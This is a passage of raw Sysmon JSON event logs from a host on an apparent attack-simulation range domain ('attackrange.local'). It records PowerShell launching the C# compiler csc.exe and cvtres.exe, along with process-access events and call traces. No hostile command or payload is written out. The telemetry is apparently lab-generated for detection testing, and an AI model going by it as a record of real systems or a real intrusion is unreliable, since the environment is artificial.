ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4443,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4444,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-030F-5F25-0000-0010637A0600}\r\nSourceProcessId: 3112\r\nSourceThreadId: 5040\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {A837DB8D-0310-5F25-0000-0010879B0600}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+9cc0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+9cc0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb73f3c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb4fd15|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb4f9e6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5d600dfb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb1057c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb6ea4b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-030F-5F25-0000-0010637A0600}","SourceProcessId":"3112","SourceThreadId":"5040","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{A837DB8D-0310-5F25-0000-0010879B0600}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+270222|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26fe9f|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f9ee|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26f97a|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+26e48b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c241b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+7c18c9|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+9cc0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P521220ea#\\7c5888f012755a21c68b60f0e76e135b\\Microsoft.PowerShell.Commands.Utility.ni.dll+9cc0(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb73f3c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb4fd15|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb4f9e6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5d600dfb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb1057c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb6ea4b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+5cb520b0","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4445,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0310-5F25-0000-0010879B0600}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0310-5F25-0000-0010879B0600}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4446,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.217\r\nSourceProcessGUID: {A837DB8D-030D-5F25-0000-00106C530600}\r\nSourceProcessId: 4344\r\nSourceThreadId: 644\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0310-5F25-0000-0010879B0600}\r\nTargetProcessId: 5108\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.217","SourceProcessGUID":"{A837DB8D-030D-5F25-0000-00106C530600}","SourceProcessId":"4344","SourceThreadId":"644","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0310-5F25-0000-0010879B0600}","TargetProcessId":"5108","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4447,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.337\r\nProcessGuid: {A837DB8D-0310-5F25-0000-0010929F0600}\r\nProcessId: 5076\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES66A1.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\CSC9E4B3910DCAE451BB0E5E91E44BECD2.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-030D-5F25-0000-0020B5520600}\r\nLogonId: 0x652B5\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {A837DB8D-0310-5F25-0000-0010879B0600}\r\nParentProcessId: 5108\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.337","ProcessGuid":"{A837DB8D-0310-5F25-0000-0010929F0600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES66A1.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\CSC9E4B3910DCAE451BB0E5E91E44BECD2.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-030D-5F25-0000-0020B5520600}","LogonId":"0x652b5","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{A837DB8D-0310-5F25-0000-0010879B0600}","ParentProcessId":"5108","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Administrator\\AppData\\Local\\Temp\\2p1lmb1q\\2p1lmb1q.cmdline\"","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4448,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-0310-5F25-0000-0010879B0600}\r\nSourceProcessId: 5108\r\nSourceThreadId: 5012\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {A837DB8D-0310-5F25-0000-0010929F0600}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:16.326","SourceProcessGUID":"{A837DB8D-0310-5F25-0000-0010879B0600}","SourceProcessId":"5108","SourceThreadId":"5012","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{A837DB8D-0310-5F25-0000-0010929F0600}","TargetProcessId":"5076","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:16","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4449,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:16.326\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0310-5F25-0000-0010929F0600}\r\nTargetProcessId: 5076\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 